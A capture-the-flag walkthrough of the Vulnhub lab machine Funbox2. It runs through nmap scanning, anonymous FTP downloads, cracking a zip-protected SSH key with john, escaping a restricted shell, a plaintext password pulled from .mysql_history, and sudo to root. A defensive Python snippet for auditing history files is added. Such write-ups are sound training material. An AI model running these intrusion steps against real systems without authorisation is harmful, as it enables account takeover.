Funbox2
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.116.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.161 08:00:27:f8:00:eb 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.161.
Nmap scan
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.161 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 22:14 EST
Nmap scan report for bogon (192.168.56.161)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:F8:00:EB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds
The Nmap scan shows that the target host has only 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).
Get Access
Start with the FTP service: the target host allows anonymous access, and the directory contains a set of zip archives:
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ftp 192.168.56.161
Connected to 192.168.56.161.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.161]
Name (192.168.56.161:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user [email protected] !
230-
230-The local time is: Tue Nov 08 03:15:44 2022
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||49020|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete
ftp> get anna.zip
local: anna.zip remote: anna.zip
229 Entering Extended Passive Mode (|||46677|)
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.65 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.16 MiB/s)
ftp> get ariel.zip
local: ariel.zip remote: ariel.zip
229 Entering Extended Passive Mode (|||51357|)
150 Opening BINARY mode data connection for ariel.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.50 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.47 MiB/s)
ftp> get bud.zip
local: bud.zip remote: bud.zip
229 Entering Extended Passive Mode (|||50686|)
150 Opening BINARY mode data connection for bud.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.51 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (157.49 KiB/s)
ftp> get cathrine.zip
local: cathrine.zip remote: cathrine.zip
229 Entering Extended Passive Mode (|||64610|)
150 Opening BINARY mode data connection for cathrine.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.95 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.61 MiB/s)
ftp> get homer.zip
local: homer.zip remote: homer.zip
229 Entering Extended Passive Mode (|||54262|)
150 Opening BINARY mode data connection for homer.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.65 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.64 MiB/s)
ftp> get jessica.zip
local: jessica.zip remote: jessica.zip
229 Entering Extended Passive Mode (|||13991|)
150 Opening BINARY mode data connection for jessica.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.23 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.37 MiB/s)
ftp> get john.zip
local: john.zip remote: john.zip
229 Entering Extended Passive Mode (|||43465|)
150 Opening BINARY mode data connection for john.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.70 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.77 MiB/s)
ftp> get marge.zip
local: marge.zip remote: marge.zip
229 Entering Extended Passive Mode (|||22454|)
150 Opening BINARY mode data connection for marge.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.78 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.50 MiB/s)
ftp> get miriam.zip
local: miriam.zip remote: miriam.zip
229 Entering Extended Passive Mode (|||15812|)
150 Opening BINARY mode data connection for miriam.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 3.00 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.90 MiB/s)
ftp> get tom.zip
local: tom.zip remote: tom.zip
229 Entering Extended Passive Mode (|||46681|)
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 1.93 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.05 MiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||36931|)
150 Opening BINARY mode data connection for welcome.msg (170 bytes)
100% |***********************************************************************************************************************************************************************************************| 170 9.00 MiB/s 00:00 ETA
226 Transfer complete
170 bytes received in 00:00 (790.54 KiB/s)
ftp> get zlatan.zip
local: zlatan.zip remote: zlatan.zip
229 Entering Extended Passive Mode (|||30105|)
150 Opening BINARY mode data connection for zlatan.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.72 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.13 MiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ls
anna.zip ariel.zip bud.zip cathrine.zip homer.zip jessica.zip john.zip marge.zip miriam.zip nmap_full_scan tom.zip welcome.msg zlatan.zip
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <root@%L>.
Download all of these zip archives to the local Kali Linux machine.
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ unzip anna.zip
Archive: anna.zip
[anna.zip] id_rsa password:
! anna_hash : No such file or directory
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john anna.zip > anna_hash
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt anna_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-07 22:19) 0g/s 8853Kp/s 8853Kc/s 8853KC/s !LUVDKR!..*7¡Vamos!
Session completed.
Judging from the pattern of the file names, these appear to be a series of usernames, and each archive probably holds an SSH private key. This one cannot be cracked, though, so it may be a trap. Note, however, that the zip files do not all have the same permissions: tom.zip is the only one without write permission.
Let's try cracking that one instead:
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john tom.zip > tom_hash
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt tom_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2022-11-07 22:21) 25.00g/s 102400p/s 102400c/s 102400C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
john recovers the password almost immediately. Using it to open tom.zip, the extracted key gives an SSH login to tom's shell:
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ssh -i id_rsa tom@192.168.56.161
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Nov 8 03:23:16 UTC 2022
System load: 0.16 Processes: 98
Usage of /: 65.1% of 4.37GB Users logged in: 0
Memory usage: 34% IP address for enp0s3: 192.168.56.161
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Sat Jul 25 12:25:33 2020 from 192.168.178.143
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd /var/www
-rbash: cd: restricted
tom@funbox2:~$
This is a restricted shell (rbash), but typing bash -i turns it into an interactive shell.
An interactive shell can also be obtained as shown below:
tom@funbox2:/var/www/html$ cd /home
tom@funbox2:/home$ ls
tom
tom@funbox2:/home$ cd tome
bash: cd: tome: No such file or directory
tom@funbox2:/home$ cd tom
tom@funbox2:~$ ls
tom@funbox2:~$ ls -alh
total 40K
drwxr-xr-x 5 tom tom 4.0K Jul 25 2020 .
drwxr-xr-x 3 root root 4.0K Jul 25 2020 ..
-rw------- 1 tom tom 6 Jul 25 2020 .bash_history
-rw-r--r-- 1 tom tom 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 tom tom 3.7K Apr 4 2018 .bashrc
drwx------ 2 tom tom 4.0K Jul 25 2020 .cache
drwx------ 3 tom tom 4.0K Jul 25 2020 .gnupg
-rw------- 1 tom tom 295 Jul 25 2020 .mysql_history
-rw-r--r-- 1 tom tom 807 Apr 4 2018 .profile
drwx------ 2 tom tom 4.0K Jul 25 2020 .ssh
-rw-r--r-- 1 tom tom 0 Jul 25 2020 .sudo_as_admin_successful
-rw------- 1 tom tom 0 Jul 25 2020 .viminfo
tom@funbox2:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$
This looks like a username and password: tom xx11yy22! (\040 is the octal escape for a space character in the history file).
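As an added example (not part of the original write-up), the Python below decodes a libedit-format .mysql_history like the one shown above and flags entries that appear to embed a credential, the check a defender would run when auditing home directories for leaked secrets. The sample history is constructed, and the set of statement patterns treated as credential-bearing is an assumption.

```python
import re

# Constructed sample in the libedit "_HiStOrY_V2_" format, modelled on the
# .mysql_history shown above: spaces are written as the octal escape \040.
SAMPLE_HISTORY = r"""_HiStOrY_V2_
show\040databases;
create\040database\040support;
use\040support
insert\040into\040support\040(tom,\040xx11yy22!);
quit
"""

HISTORY_HEADER = "_HiStOrY_V2_"

# libedit stores each entry with strvis(): space, tab and newline become
# 3-digit octal escapes and a literal backslash becomes "\\".  One regex
# handles both so an escaped backslash followed by digits is not re-decoded.
_ESCAPE = re.compile(r"\\(\\|[0-7]{3})")

# Statement shapes that commonly carry a secret as a literal (assumed list).
_SECRET_STATEMENTS = re.compile(
    r"^\s*(insert\s+into|create\s+user|alter\s+user|set\s+password)"
    r"|identified\s+by|password\s*\(",
    re.IGNORECASE,
)


def _unescape(match):
    token = match.group(1)
    return "\\" if token == "\\" else chr(int(token, 8))


def decode_history(text):
    """Return the history entries as plain text, header line dropped."""
    lines = text.splitlines()
    if lines and lines[0] == HISTORY_HEADER:
        lines = lines[1:]
    return [_ESCAPE.sub(_unescape, line) for line in lines if line.strip()]


def find_secret_statements(text):
    """Decode a history file and return (entry_no, statement) pairs that
    look like they embed a credential, for review during an audit."""
    entries = decode_history(text)
    return [(i, e) for i, e in enumerate(entries, 1)
            if _SECRET_STATEMENTS.search(e)]


if __name__ == "__main__":
    for no, stmt in find_secret_statements(SAMPLE_HISTORY):
        print(f"entry {no}: {stmt}")
```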
The rest is straightforward:
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tom may run the following commands on funbox2:
(ALL : ALL) ALL
tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom# cd /root
root@funbox2:~# ls
flag.txt
root@funbox2:~# cat flag.txt
____ __ __ _ __ ___ ____ _ __ ___
/ __/ / / / / / |/ / / _ ) / __ \ | |/_/ |_ |
/ _/ / /_/ / / / / _ |/ /_/ / _> < / __/
/_/ \____/ /_/|_/ /____/ \____/ /_/|_| __ /____/
____ ___ ___ / /_ ___ ___/ / / /
_ _ _ / __// _ \/ _ \/ __// -_)/ _ / /_/
(_)(_)(_)/_/ \___/\___/\__/ \__/ \_,_/ (_)
from @0815R2d2 with ♥
root@funbox2:~#
The root flag is obtained!
Tags: ftp, zip, Vulnhub, tom, Funbox2. Source: https://www.cnblogs.com/jason-huawen/p/16869179.html